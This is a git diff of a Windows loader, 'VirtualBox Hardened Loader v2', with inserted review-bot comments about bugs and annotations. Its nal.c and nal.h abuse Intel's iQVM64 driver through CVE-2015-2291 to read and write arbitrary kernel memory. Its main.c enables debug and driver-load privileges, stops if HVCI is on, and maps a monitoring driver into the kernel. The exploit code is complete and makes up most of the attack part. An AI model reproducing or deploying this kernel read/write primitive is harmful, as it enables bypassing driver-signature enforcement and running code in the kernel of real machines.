dwError = ERROR_SUCCESS; + NAL_MEMMOVE request; + + PVOID lockedBuffer = (PVOID)VirtualAlloc(NULL, NumberOfBytes, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE); + if (lockedBuffer) { + + if (VirtualLock(lockedBuffer, NumberOfBytes)) { + + RtlSecureZeroMemory(&request, sizeof(request)); + request.Header.FunctionId = NAL_FUNCID_MEMMOVE; + request.SourceAddress = VirtualAddress; + request.DestinationAddress = (ULONG_PTR)lockedBuffer; + request.Length = NumberOfBytes; + + bResult = NalCallDriver(DeviceHandle, &request, sizeof(request)); + if (bResult) { + RtlCopyMemory(Buffer, lockedBuffer, NumberOfBytes); + } + else { + dwError = GetLastError(); + } + + VirtualUnlock(lockedBuffer, NumberOfBytes); + } + else { + dwError = GetLastError(); + } + + VirtualFree(lockedBuffer, 0, MEM_RELEASE); + } + else { + dwError = GetLastError(); + } + SetLastError(dwError); + return bResult; +} + +/* +* NalWriteVirtualMemory +* +* Purpose: +* +* 
Write virtual memory via Nal memmove switch case. +* +*/ +_Success_(return != FALSE) +BOOL NalWriteVirtualMemory( + _In_ HANDLE DeviceHandle, + _In_ ULONG_PTR VirtualAddress, + _Out_writes_bytes_(NumberOfBytes) PVOID Buffer, + _In_ ULONG NumberOfBytes) +{ + BOOL bResult = FALSE; + DWORD dwError = ERROR_SUCCESS; + NAL_MEMMOVE request; + + PVOID lockedBuffer = (PVOID)VirtualAlloc(NULL, NumberOfBytes, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE); + if (lockedBuffer) { + + RtlCopyMemory(lockedBuffer, Buffer, NumberOfBytes); + + if (VirtualLock(lockedBuffer, NumberOfBytes)) { + + RtlSecureZeroMemory(&request, sizeof(request)); + request.Header.FunctionId = NAL_FUNCID_MEMMOVE; + request.SourceAddress = (ULONG_PTR)lockedBuffer; + request.DestinationAddress = VirtualAddress; + request.Length = NumberOfBytes; + + bResult = NalCallDriver(DeviceHandle, &request, sizeof(request)); + if (bResult == FALSE) { + dwError = GetLastError(); + } + + VirtualUnlock(lockedBuffer, NumberOfBytes); + } + else { + dwError = GetLastError(); + } + + VirtualFree(lockedBuffer, 0, MEM_RELEASE); + } + else { + dwError = GetLastError(); + } + + SetLastError(dwError); + return bResult; +} + +/* +* NalWriteVirtualMemory +* +* Purpose: +* +* Write to virtual memory via mapping. 
+* +*/ +_Success_(return != FALSE) +BOOL NalWriteVirtualMemoryEx( + _In_ HANDLE DeviceHandle, + _In_ ULONG_PTR VirtualAddress, + _Out_writes_bytes_(NumberOfBytes) PVOID Buffer, + _In_ ULONG NumberOfBytes +) +{ + BOOL bResult = FALSE; + DWORD dwError = ERROR_SUCCESS; + ULONG_PTR physAddress, mappedVirt; + + if (NalVirtualToPhysical(DeviceHandle, VirtualAddress, &physAddress)) { + + if (NalMapAddressEx(DeviceHandle, physAddress, &mappedVirt, NumberOfBytes)) { + + bResult = NalWriteVirtualMemory(DeviceHandle, mappedVirt, Buffer, NumberOfBytes); + if (bResult == FALSE) + dwError = GetLastError(); + + NalUnmapAddress(DeviceHandle, mappedVirt, NumberOfBytes); + } + else { + dwError = GetLastError(); + } + + } + else { + dwError = GetLastError(); + } + SetLastError(dwError); + return bResult; +} + +/* +* NalReadVirtualMemoryEx +* +* Purpose: +* +* Read virtual memory via mapping. +* +*/ +_Success_(return != FALSE) +BOOL NalReadVirtualMemoryEx( + _In_ HANDLE DeviceHandle, + _In_ ULONG_PTR VirtualAddress, + _Out_writes_bytes_(NumberOfBytes) PVOID Buffer, + _In_ ULONG NumberOfBytes) +{ + BOOL bResult = FALSE; + DWORD dwError = ERROR_SUCCESS; + PVOID lockedBuffer = (PVOID)VirtualAlloc(NULL, NumberOfBytes, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE); + if (lockedBuffer) { + + if (VirtualLock(lockedBuffer, NumberOfBytes)) { + + ULONG_PTR physicalAddress, newVirt; + + if (NalVirtualToPhysical(DeviceHandle, VirtualAddress, &physicalAddress)) { + if (NalMapAddressEx(DeviceHandle, physicalAddress, &newVirt, NumberOfBytes)) { + + bResult = NalReadVirtualMemory(DeviceHandle, newVirt, lockedBuffer, NumberOfBytes); + if (bResult) { + RtlCopyMemory(Buffer, lockedBuffer, NumberOfBytes); + } + else { + dwError = GetLastError(); + } + + NalUnmapAddress(DeviceHandle, newVirt, NumberOfBytes); + } + } + else { + dwError = GetLastError(); + } + + VirtualUnlock(lockedBuffer, NumberOfBytes); + } + else { + dwError = GetLastError(); + } + + VirtualFree(lockedBuffer, 0, MEM_RELEASE); + } + else { + 
dwError = GetLastError(); + } + + SetLastError(dwError); + return bResult; +} diff --git a/Source/Zekamashi_v2/loader/idrv/nal.h b/Source/Zekamashi_v2/loader/idrv/nal.h new file mode 100644 index 0000000..ca6a409 --- /dev/null +++ b/Source/Zekamashi_v2/loader/idrv/nal.h 
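Review bot: NalReadVirtualMemoryEx returns FALSE with last-error still ERROR_SUCCESS when NalMapAddressEx fails, because the inner `if (NalMapAddressEx(...))` has no else branch that sets dwError the way the surrounding NalVirtualToPhysical branch and NalWriteVirtualMemoryEx do; add `else dwError = GetLastError();` after that inner block. Separately, both *Ex helpers translate only VirtualAddress and then map NumberOfBytes starting at that physical address, yet the translation is valid for one page, so a request that crosses a page boundary may map unrelated physical memory unless the target happens to be physically contiguous — a guard such as `if (((VirtualAddress & 0xFFF) + NumberOfBytes) > 0x1000) { SetLastError(ERROR_INVALID_PARAMETER); return FALSE; }` (or a per-page loop) would make that limitation explicit. The header comment above NalWriteVirtualMemoryEx still names the function NalWriteVirtualMemory, and the N.B. on NalVirtualToPhysical refers to MmGetVirtualForPhysical although the routine translates virtual to physical — presumably the reverse routine is meant; worth confirming against the driver before fixing the comment.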
@@ -0,0 +1,119 @@ +/******************************************************************************* +* +* (C) COPYRIGHT AUTHORS, 2020 +* +* TITLE: NAL.H +* +* VERSION: 1.00 +* +* DATE: 24 Jan 2020 +* +* Intel Network Adapter iQVM64 driver interface header. +* +* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF +* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED +* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A +* PARTICULAR PURPOSE. +* +*******************************************************************************/ + +#pragma once + +// +// INTEL NAL driver interface for CVE-2015-2291. +// + +#define INTEL_DEVICE_TYPE (DWORD)0x8086 +#define INTEL_DEVICE_FUNCTION (DWORD)2049 + +#define NAL_FUNCID_MAPIOSPACE (DWORD)0x19 +#define NAL_FUNCID_UNMAPIOSPACE (DWORD)0x1A +#define NAL_FUNCID_VIRTUALTOPHYSCAL (DWORD)0x25 +#define NAL_FUNCID_MEMSET (DWORD)0x30 +#define NAL_FUNCID_MEMMOVE (DWORD)0x33 + +#define IOCTL_NAL_MANAGE CTL_CODE(INTEL_DEVICE_TYPE, INTEL_DEVICE_FUNCTION, METHOD_NEITHER, FILE_ANY_ACCESS) //0x80862007 + + +typedef struct _NAL_REQUEST_HEADER { + ULONG_PTR FunctionId; + ULONG_PTR Unused0; +} NAL_REQUEST_HEADER, * PNAL_REQUEST_HEADER; + +typedef struct _NAL_GET_PHYSICAL_ADDRESS { + NAL_REQUEST_HEADER Header; + ULONG_PTR PhysicalAddress; + ULONG_PTR VirtualAddress; +} NAL_GET_PHYSICAL_ADDRESS, * PNAL_GET_PHYSICAL_ADDRESS; + +typedef struct _NAL_MEMMOVE { + NAL_REQUEST_HEADER Header; + ULONG_PTR SourceAddress; + ULONG_PTR DestinationAddress; + ULONG_PTR Length; +} NAL_MEMMOVE, * PNAL_MEMMOVE; + +typedef struct _NAL_MAP_IO_SPACE { + NAL_REQUEST_HEADER Header; + ULONG_PTR OpResult; //0 mean success + ULONG_PTR VirtualAddress; + ULONG_PTR PhysicalAddress; + ULONG NumberOfBytes; +} NAL_MAP_IO_SPACE, * PNAL_MAP_IO_SPACE; + +typedef struct _NAL_UNMAP_IO_SPACE { + NAL_REQUEST_HEADER Header; + ULONG_PTR OpResult; //0 mean success + ULONG_PTR VirtualAddress; + ULONG_PTR Unused0; + ULONG NumberOfBytes; +} 
NAL_UNMAP_IO_SPACE, * PNAL_UNMAP_IO_SPACE; + +BOOL NalCallDriver( + _In_ HANDLE DeviceHandle, + _In_ PVOID Buffer, + _In_ ULONG Size); + +BOOL NalMapAddressEx( + _In_ HANDLE DeviceHandle, + _In_ ULONG_PTR PhysicalAddress, + _Out_ ULONG_PTR* VirtualAddress, + _In_ ULONG NumberOfBytes); + +BOOL NalUnmapAddress( + _In_ HANDLE DeviceHandle, + _In_ ULONG_PTR VirtualAddress, + _In_ ULONG NumberOfBytes); + +BOOL NalVirtualToPhysical( + _In_ HANDLE DeviceHandle, + _In_ ULONG_PTR VirtualAddress, + _Out_ ULONG_PTR* PhysicalAddress); + +_Success_(return != FALSE) +BOOL NalReadVirtualMemory( + _In_ HANDLE DeviceHandle, + _In_ ULONG_PTR VirtualAddress, + _Out_writes_bytes_(NumberOfBytes) PVOID Buffer, + _In_ ULONG NumberOfBytes); + +_Success_(return != FALSE) +BOOL NalWriteVirtualMemory( + _In_ HANDLE DeviceHandle, + _In_ ULONG_PTR VirtualAddress, + _Out_writes_bytes_(NumberOfBytes) PVOID Buffer, + _In_ ULONG NumberOfBytes); + +_Success_(return != FALSE) +BOOL NalReadVirtualMemoryEx( + _In_ HANDLE DeviceHandle, + _In_ ULONG_PTR VirtualAddress, + _Out_writes_bytes_(NumberOfBytes) PVOID Buffer, + _In_ ULONG NumberOfBytes); + +_Success_(return != FALSE) +BOOL NalWriteVirtualMemoryEx( + _In_ HANDLE DeviceHandle, + _In_ ULONG_PTR VirtualAddress, + _Out_writes_bytes_(NumberOfBytes) PVOID Buffer, + _In_ ULONG NumberOfBytes); diff --git a/Source/Kasumi/VBoxPatchGen/VBoxPatchGen.vcxproj b/Source/Zekamashi_v2/loader/loader.vcxproj similarity index 62% rename from Source/Kasumi/VBoxPatchGen/VBoxPatchGen.vcxproj rename to Source/Zekamashi_v2/loader/loader.vcxproj index b03e429..382f93b 100644 --- a/Source/Kasumi/VBoxPatchGen/VBoxPatchGen.vcxproj +++ b/Source/Zekamashi_v2/loader/loader.vcxproj @@ -11,23 +11,23 @@ - {F706DA8E-B4E2-4E2B-A47E-317C7408303D} + {2AFB187B-63FB-40C6-B54C-38D559E5124C} Win32Proj - VBoxPatchGen - 10.0.17763.0 - Kasumi + loader + loader + 10.0 Application true - v141 + v142 Unicode Application false - v141 + v142 true Unicode Spectre @@ -35,12 +35,10 @@ - - - + - + 
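Review bot: The Buffer parameter of NalWriteVirtualMemory and NalWriteVirtualMemoryEx is annotated `_Out_writes_bytes_(NumberOfBytes)` although both functions read from it (nal.c copies Buffer into the locked staging buffer before calling the driver), so the annotation should be `_In_reads_bytes_(NumberOfBytes) PVOID Buffer` on both prototypes and their definitions — as written, static analysis treats the caller's data as uninitialized output. `NAL_FUNCID_VIRTUALTOPHYSCAL` looks like a typo for VIRTUALTOPHYSICAL; renaming is cosmetic but the identifier is used from nal.c, so both sites would have to change. `NAL_FUNCID_MEMSET` has no user in the visible nal.c; if it is kept for later use, a short comment saying so would help.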
@@ -48,12 +46,16 @@ true .\output\$(Platform)\$(Configuration)\ .\output\$(Platform)\$(Configuration)\ + loader + AllRules.ruleset + false false .\output\$(Platform)\$(Configuration)\ .\output\$(Platform)\$(Configuration)\ - AllRules.ruleset + loader + NativeRecommendedRules.ruleset true @@ -62,69 +64,110 @@ Level4 Disabled - _DEBUG;_CONSOLE;%(PreprocessorDefinitions) + WIN32;_DEBUG;_WINDOWS;_SIGNEDBUILD;%(PreprocessorDefinitions) + + true - CompileAsC + false + $(ProjectDir);%(AdditionalIncludeDirectories) Console true - KasumiMain + + + 6.0 + + oscompat.manifest + Level4 - MinSpace + Full true true - NDEBUG;_CONSOLE;%(PreprocessorDefinitions) - true - CompileAsC + true + Size true + MultiThreaded + true + + + true true Guard - MultiThreaded - true false + $(ProjectDir);%(AdditionalIncludeDirectories) Console + false true true - false - KasumiMain - true 6.0 + RequireAdministrator + true + + + true /NOCOFFGRPINFO %(AdditionalOptions) - + + + + oscompat.manifest + - + + + + + + + + + CompileAsC + CompileAsC + + - + + + + + + - + + + + + + + + diff --git a/Source/Zekamashi/loader/loader.vcxproj.filters b/Source/Zekamashi_v2/loader/loader.vcxproj.filters similarity index 68% rename from Source/Zekamashi/loader/loader.vcxproj.filters rename to Source/Zekamashi_v2/loader/loader.vcxproj.filters index 7fcd47f..06a63f9 100644 --- a/Source/Zekamashi/loader/loader.vcxproj.filters +++ b/Source/Zekamashi_v2/loader/loader.vcxproj.filters @@ -16,6 +16,15 @@ {a24e0382-d2e7-462c-b399-0f0a73936850} + + {4adfe35a-0c15-4102-93ba-0a31bc281fc7} + + + {a24614ae-46b0-4a3f-a979-2d467c47a833} + + + {60e9e934-2c31-4d73-968c-97851c2fe8a9} + @@ -33,9 +42,6 @@ minirtl - - Source Files - minirtl @@ -45,21 +51,30 @@ minirtl - + minirtl - + + Source Files + + minirtl - + minirtl - + Source Files - + + idrv + + Source Files + + hde + 
@@ -74,28 +89,50 @@ Header Files - - Header Files - minirtl - - Header Files - minirtl - + Header Files - + + Header Files + + + ntdll + + + idrv + + + Source Files + + + Header Files + + Header Files + + hde + + + hde + + + hde + Resource Files + + + + \ No newline at end of file diff --git a/Source/Zekamashi/loader/loader.vcxproj.user b/Source/Zekamashi_v2/loader/loader.vcxproj.user similarity index 57% rename from Source/Zekamashi/loader/loader.vcxproj.user rename to Source/Zekamashi_v2/loader/loader.vcxproj.user index 7e06580..a4db295 100644 --- a/Source/Zekamashi/loader/loader.vcxproj.user +++ b/Source/Zekamashi_v2/loader/loader.vcxproj.user @@ -1,21 +1,13 @@  - /? - WindowsLocalDebugger - - WindowsLocalDebugger - + WindowsLocalDebugger - - - WindowsLocalDebugger - \ No newline at end of file diff --git a/Source/Zekamashi_v2/loader/main.c b/Source/Zekamashi_v2/loader/main.c new file mode 100644 index 0000000..ff4c19a --- /dev/null +++ b/Source/Zekamashi_v2/loader/main.c 
@@ -0,0 +1,525 @@ +/******************************************************************************* +* +* (C) COPYRIGHT AUTHORS, 2014 - 2020 +* +* TITLE: MAIN.C +* +* VERSION: 2.00 +* +* DATE: 24 Jan 2020 +* +* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF +* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED +* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A +* PARTICULAR PURPOSE. +* +*******************************************************************************/ + +#include "global.h" + +#pragma data_seg("shrd") +volatile LONG g_lApplicationInstances = 0; +#pragma data_seg() + +#define T_PROGRAMTITLE "VirtualBox Hardened Loader v2.0.0.2002" + +ULONG_PTR g_MaximumUserModeAddress = 0; + +TABLE_DESC g_PatchData = { NULL, 0 }; + +// +// Help output. +// +#define T_HELP "Loader for Tsugumi monitoring driver.\r\n\r\n\ +Optional parameters to execute: \r\n\r\n\ +LOADER [/s] or [/c] Table\r\n\r\n\ + /s - stop monitoring and purge system cache.\r\n\ + /c [Table] - optional, custom VBoxDD patch table fullpath.\r\n\r\n\ + Example: ldr.exe /c vboxdd.bin" + +/* +* ShowVirtualBoxVesion +* +* Purpose: +* +* Read version from registry and output to console. +* +*/ +VOID ShowVirtualBoxVersion() +{ + HKEY hKey = NULL; + LRESULT lRet; + DWORD dwSize; + TCHAR szBuffer[MAX_PATH + 1]; + + // + // Failures are non critical. + // + lRet = RegOpenKeyEx(HKEY_LOCAL_MACHINE, TEXT("Software\\Oracle\\VirtualBox"), + 0, KEY_READ, &hKey); + + if (lRet == ERROR_SUCCESS) { + + // + // Read VBox version. + // + RtlSecureZeroMemory(&szBuffer, sizeof(szBuffer)); + dwSize = MAX_PATH * sizeof(TCHAR); + lRet = RegQueryValueEx(hKey, TEXT("Version"), NULL, NULL, (LPBYTE)&szBuffer, &dwSize); + if (lRet == ERROR_SUCCESS) { + printf_s("LDR: VirtualBox version %wS\r\n", szBuffer); + } + + RegCloseKey(hKey); + } +} + +/* +* FetchCustomPatchData +* +* Purpose: +* +* Load custom patch table. +* Returned buffer must be freed with HeapFree after usage. 
+* +*/ +PVOID FetchCustomPatchData( + _In_ LPWSTR lpFileName, + _Inout_opt_ PDWORD pdwPatchDataSize +) +{ + DWORD dwFileSize; + HANDLE hFile; + PVOID DataBuffer = NULL; + + LARGE_INTEGER FileSize; + + // + // Validate input parameter. + // + if (lpFileName == NULL) + return NULL; + + // + // Open file with custom patch table. + // + hFile = CreateFile(lpFileName, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL); + if (hFile == INVALID_HANDLE_VALUE) + return NULL; + + // + // Get file size for buffer, allocate it and read data. + // + RtlSecureZeroMemory(&FileSize, sizeof(LARGE_INTEGER)); + if (GetFileSizeEx(hFile, &FileSize)) { + dwFileSize = FileSize.LowPart; + if (dwFileSize > 0 && dwFileSize <= MAX_CONFIGURATION_DATA_SIZE) { + DataBuffer = (PVOID)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, dwFileSize); + if (DataBuffer != NULL) { + + if (ReadFile(hFile, DataBuffer, dwFileSize, &dwFileSize, NULL)) { + + // Check if optional parameter is set and return data size on true. + if (pdwPatchDataSize != NULL) { + *pdwPatchDataSize = dwFileSize; + } + } + } + } + } + CloseHandle(hFile); + return DataBuffer; +} + +/* +* CreatePatchTable +* +* Purpose: +* +* Create patch table depending on installed VBox dll. +* +*/ +BOOL CreatePatchTable( + VOID +) +{ + BOOL bResult = FALSE; + DWORD dwSize, cch; + HKEY hKey = NULL; + LRESULT lRet; + TCHAR szBuffer[MAX_PATH * 2], szTempFile[MAX_PATH * 2]; + + do { + + lRet = RegOpenKeyEx(HKEY_LOCAL_MACHINE, TEXT("Software\\Oracle\\VirtualBox"), + 0, KEY_READ, &hKey); + + // + // If key not exists, return FALSE and loader will exit. + // + if ((lRet != ERROR_SUCCESS) || (hKey == NULL)) { + printf_s("LDR: Cannot open VirtualBox registry key, error %lli\r\n", lRet); + break; + } + + // + // Read VBox location. 
+ // + RtlSecureZeroMemory(&szBuffer, sizeof(szBuffer)); + dwSize = MAX_PATH * sizeof(TCHAR); + lRet = RegQueryValueEx(hKey, TEXT("InstallDir"), NULL, NULL, (LPBYTE)&szBuffer, &dwSize); + if (lRet != ERROR_SUCCESS) { + printf_s("LDR: Cannot query VirtualBox installation directory, error %lli\r\n", lRet); + break; + } + + _strcat(szBuffer, TEXT("VBoxDD.dll")); + + RtlSecureZeroMemory(szTempFile, sizeof(szTempFile)); + cch = supExpandEnvironmentStrings(TEXT("%temp%\\"), szTempFile, MAX_PATH); + if ((cch != 0) && (cch < MAX_PATH)) { + // + // Give VBoxDD.dll new name in %temp% so it won't get patched if monitor already loaded. + // + _strcat(szTempFile, L"nyan.dll"); + if (CopyFile(szBuffer, szTempFile, FALSE) == FALSE) { + printf_s("LDR: Cannot copy VBoxDD to the temp folder, error %lu\r\n", GetLastError()); + break; + } + + TABLE_DESC localTable; + + localTable.DDTablePointer = NULL; + localTable.DDTableSize = 0; + if (ProcessVirtualBoxFile(szTempFile, &localTable.DDTablePointer, &localTable.DDTableSize) == 0) { + + if (localTable.DDTableSize > MAX_CONFIGURATION_DATA_SIZE) { + printf_s("LDR: Patch data size %lu exceed data size limit %lu\r\n", + localTable.DDTableSize, + MAX_CONFIGURATION_DATA_SIZE); + } + else { + g_PatchData.DDTablePointer = localTable.DDTablePointer; + g_PatchData.DDTableSize = localTable.DDTableSize; + bResult = TRUE; + } + } + else { + printf_s("LDR: Error while processing VBoxDD file\r\n"); + } + + // + // Remove nyan.dll from %temp%. + // + DeleteFile(szTempFile); + } + else { + printf_s("LDR: Could not expand environment variable for temp directory\r\n"); + } + + } while (FALSE); + + if (hKey) { + RegCloseKey(hKey); + } + + return bResult; +} + +/* +* ListTokenPrivileges +* +* Purpose: +* +* List all available privileges of current process token. 
+* +*/ +VOID ListTokenPrivileges() +{ + PTOKEN_PRIVILEGES pTokenPrivs; + HANDLE TokenHandle = supGetCurrentProcessToken(); + + WCHAR szPrivName[MAX_PATH + 1]; + ULONG cchName; + + BOOLEAN Enabled, EnabledByDefault; + + printf_s(T_PRNTDEFAULT, "LDR: Listing process token privileges..."); + + if (TokenHandle) { + + pTokenPrivs = (PTOKEN_PRIVILEGES)supGetTokenInfo(TokenHandle, + TokenPrivileges, + NULL); + + if (pTokenPrivs) { + + for (ULONG i = 0; i < pTokenPrivs->PrivilegeCount; i++) { + + // + // Output privilege flags like Process Explorer. + // + szPrivName[0] = 0; + cchName = MAX_PATH; + if (LookupPrivilegeName(NULL, &pTokenPrivs->Privileges[i].Luid, + szPrivName, &cchName)) + { + Enabled = pTokenPrivs->Privileges[i].Attributes & SE_PRIVILEGE_ENABLED; + EnabledByDefault = pTokenPrivs->Privileges[i].Attributes & SE_PRIVILEGE_ENABLED_BY_DEFAULT; + + printf_s("LDR: %ws %s %s\r\n", + szPrivName, + Enabled ? "Enabled" : "Disabled", + EnabledByDefault ? "(Default Enabled)" : ""); + + } + + } + + supHeapFree(pTokenPrivs); + } + else { + printf_s(T_PRNTDEFAULT, "[!] Could not query token privileges"); + } + NtClose(TokenHandle); + } + +} + +/* +* AssignPrivileges +* +* Purpose: +* +* Assign required privileges. +* +*/ +BOOLEAN AssignPrivileges( + _In_ BOOLEAN IsDebugRequired +) +{ + NTSTATUS ntStatus; + + if (IsDebugRequired) { + ntStatus = supEnablePrivilege(SE_DEBUG_PRIVILEGE, TRUE); + if (!NT_SUCCESS(ntStatus)) { + printf_s("[!] Abort: SeDebugPrivilege is not assigned! NTSTATUS (0x%lX)\r\n", ntStatus); + return FALSE; + } + } + + ntStatus = supEnablePrivilege(SE_LOAD_DRIVER_PRIVILEGE, TRUE); + if (!NT_SUCCESS(ntStatus)) { + printf_s("[!] Abort: SeLoadDriverPrivilege is not assigned! NTSTATUS (0x%lX)\r\n", ntStatus); + return FALSE; + } + + return TRUE; +} + +/* +* VBoxLdrMain +* +* Purpose: +* +* Program main. 
+* +*/ +int VBoxLdrMain( + VOID +) +{ + BOOL bCustomTableAllocated = FALSE; + LONG x; + ULONG dataLength = 0; + PVOID DataBufferDD = NULL; + WCHAR szParameter[MAX_PATH * 2]; + + OSVERSIONINFO osv; + + printf_s("[>] Entering %s\r\n", __FUNCTION__); + +#ifdef _DEBUG + printf_s(T_PRNTDEFAULT, "[!] Debug build!"); +#endif + + do { + + // + // Check number of instances running. + // + x = InterlockedIncrement((PLONG)&g_lApplicationInstances); + if (x > 1) { + break; + } + + // + // Check OS version. + // + RtlSecureZeroMemory(&osv, sizeof(osv)); + osv.dwOSVersionInfoSize = sizeof(osv); + RtlGetVersion((PRTL_OSVERSIONINFOW)&osv); + if (osv.dwMajorVersion < 6) { + printf_s(T_PRNTDEFAULT, "LDR: This operation system version is not supported"); + break; + } + + if (!supUserIsFullAdmin()) { + printf_s(T_PRNTDEFAULT, "[!] No administrator rights or runs not elevated, program will fail"); + } + else { + ListTokenPrivileges(); + } + + ShowVirtualBoxVersion(); + + CHAR szVersion[100]; + + StringCchPrintfA(szVersion, 100, + "LDR: Windows version: %u.%u build %u", + osv.dwMajorVersion, + osv.dwMinorVersion, + osv.dwBuildNumber); + + printf_s(T_PRNTDEFAULT, szVersion); + + g_MaximumUserModeAddress = supQueryMaximumUserModeAddress(); + printf_s("LDR: Maximum User Mode address 0x%llX\r\n", g_MaximumUserModeAddress); + + BOOLEAN hvciEnabled; + BOOLEAN hvciStrict; + BOOLEAN hvciIUM; + + // + // Provider is not HVCI compatible. + // + if (supQueryHVCIState(&hvciEnabled, &hvciStrict, &hvciIUM)) { + + if (hvciEnabled) { + printf_s(T_PRNTDEFAULT, "[!] Windows HVCI mode detected - this is unsupported"); + break; + } + + } + + // + // Parse command line, can only be /s /c or /? 
+ //
+
+ //
+ // Stop
+ //
+ if (supGetCommandLineOption(TEXT("/s"),
+ FALSE,
+ NULL,
+ 0))
+ {
+ printf_s(T_PRNTDEFAULT, "LDR: Monitor stop selected");
+
+ if (AssignPrivileges(FALSE)) {
+ VictimRelease((LPWSTR)PROCEXP152);
+ printf_s(T_PRNTDEFAULT, "LDR: Purging system cache");
+ supPurgeSystemCache();
+ }
+ break;
+ }
+ else {
+ //
+ // Custom table.
+ //
+ if (supGetCommandLineOption(TEXT("/c"),
+ TRUE,
+ szParameter,
+ sizeof(szParameter) / sizeof(WCHAR)))
+ {
+ dataLength = 0;
+ DataBufferDD = FetchCustomPatchData(szParameter, &dataLength);
+ if ((DataBufferDD != NULL) && (dataLength > 0)) {
+ g_PatchData.DDTablePointer = DataBufferDD;
+ g_PatchData.DDTableSize = dataLength;
+ bCustomTableAllocated = TRUE;
+ printf_s(T_PRNTDEFAULT, "LDR: Custom patch table loaded");
+ }
+ else {
+ printf_s(T_PRNTDEFAULT, "LDR: Error reading specfied file");
+ break;
+ }
+
+ }
+ else {
+ //
+ // Help.
+ //
+ if (supGetCommandLineOption(TEXT("/?"),
+ FALSE,
+ NULL,
+ 0))
+ {
+ printf_s(T_PRNTDEFAULT, T_HELP);
+ break;
+ }
+ }
+ }
+
+
+ //
+ // Check if custom patch table present. If not - attempt to create own. Exit on failure.
+ //
+ if (bCustomTableAllocated == FALSE) {
+ if (CreatePatchTable()) {
+ printf_s(T_PRNTDEFAULT, "LDR: Patch table created");
+ }
+ else {
+ printf_s(T_PRNTDEFAULT, "LDR: Could not load patch table");
+ break;
+ }
+ }
+
+#ifndef _DEBUG
+ //
+ // Check if any VBox instances are running, they must be closed before our usage.
+ //
+ if (supProcessExist(L"VirtualBox.exe")) {
+ printf_s(T_PRNTDEFAULT, "LDR: VirtualBox is running, close it before");
+ break;
+ }
+#endif
+
+ if (AssignPrivileges(TRUE)) {
+
+ if (!MapTsugumi(&g_PatchData)) {
+ printf_s(T_PRNTDEFAULT, "LDR: Cannot inject monitor code");
+ break;
+ }
+ else {
+ printf_s(T_PRNTDEFAULT, "LDR: Monitor code injected and executed");
+ printf_s(T_PRNTDEFAULT, "LDR: Purging system cache");
+ supPurgeSystemCache();
+ }
+
+ }
+
+ } while (FALSE);
+
+ printf_s("[<] Leaving %s\r\n", __FUNCTION__);
+ InterlockedDecrement((PLONG)&g_lApplicationInstances);
+ return 1;
+}
+
+
+/*
+* main
+*
+* Purpose:
+*
+* Program entry point.
+*
+*/
+int main()
+{
+ HeapSetInformation(NULL, HeapEnableTerminationOnCorruption, NULL, 0);
+
+ printf_s(T_PRNTDEFAULT, T_PROGRAMTITLE);
+
+ return VBoxLdrMain();
+}
diff --git a/Source/Kasumi/VBoxPatchGen/minirtl/_strcat.c b/Source/Zekamashi_v2/loader/minirtl/_strcat.c
similarity index 100%
rename from Source/Kasumi/VBoxPatchGen/minirtl/_strcat.c
rename to Source/Zekamashi_v2/loader/minirtl/_strcat.c
diff --git a/Source/Zekamashi_v2/loader/minirtl/_strcmp.c b/Source/Zekamashi_v2/loader/minirtl/_strcmp.c
new file mode 100644
index 0000000..fc35624
--- /dev/null
+++ b/Source/Zekamashi_v2/loader/minirtl/_strcmp.c
@@ -0,0 +1,47 @@
+#include "rtltypes.h"
+
+int _strcmp_a(const char *s1, const char *s2)
+{
+ char c1, c2;
+
+ if ( s1==s2 )
+ return 0;
+
+ if ( s1==0 )
+ return -1;
+
+ if ( s2==0 )
+ return 1;
+
+ do {
+ c1 = *s1;
+ c2 = *s2;
+ s1++;
+ s2++;
+ } while ( (c1 != 0) && (c1 == c2) );
+
+ return (int)(c1 - c2);
+}
+
+int _strcmp_w(const wchar_t *s1, const wchar_t *s2)
+{
+ wchar_t c1, c2;
+
+ if ( s1==s2 )
+ return 0;
+
+ if ( s1==0 )
+ return -1;
+
+ if ( s2==0 )
+ return 1;
+
+ do {
+ c1 = *s1;
+ c2 = *s2;
+ s1++;
+ s2++;
+ } while ( (c1 != 0) && (c1 == c2) );
+
+ return (int)(c1 - c2);
+}
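Review bot: `_strcmp_a` returns `(int)(c1 - c2)` with plain `char` operands, so on a toolchain where `char` is signed any byte at or above 0x80 sorts before ASCII, which is the opposite of the CRT `strcmp` contract of comparing as `unsigned char`. If every caller only tests the result for zero this is harmless, but any caller that relies on ordering will silently disagree with the CRT; `return (int)((unsigned char)c1 - (unsigned char)c2);` restores the conventional ordering. The `_strcmp_w` variant presumably escapes this because `wchar_t` is an unsigned 16-bit type on the intended target, but that is an assumption about the target, so a one-line comment on each function stating the ordering it guarantees (or that only equality is meaningful) would help the next reader.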
diff --git a/Source/Zekamashi/loader/minirtl/_strcmpi.c b/Source/Zekamashi_v2/loader/minirtl/_strcmpi.c
similarity index 100%
rename from Source/Zekamashi/loader/minirtl/_strcmpi.c
rename to Source/Zekamashi_v2/loader/minirtl/_strcmpi.c
diff --git a/Source/Kasumi/VBoxPatchGen/minirtl/_strcpy.c b/Source/Zekamashi_v2/loader/minirtl/_strcpy.c
similarity index 100%
rename from Source/Kasumi/VBoxPatchGen/minirtl/_strcpy.c
rename to Source/Zekamashi_v2/loader/minirtl/_strcpy.c
diff --git a/Source/Kasumi/VBoxPatchGen/minirtl/_strend.c b/Source/Zekamashi_v2/loader/minirtl/_strend.c
similarity index 100%
rename from Source/Kasumi/VBoxPatchGen/minirtl/_strend.c
rename to Source/Zekamashi_v2/loader/minirtl/_strend.c
diff --git a/Source/Kasumi/VBoxPatchGen/minirtl/_strlen.c b/Source/Zekamashi_v2/loader/minirtl/_strlen.c
similarity index 100%
rename from Source/Kasumi/VBoxPatchGen/minirtl/_strlen.c
rename to Source/Zekamashi_v2/loader/minirtl/_strlen.c
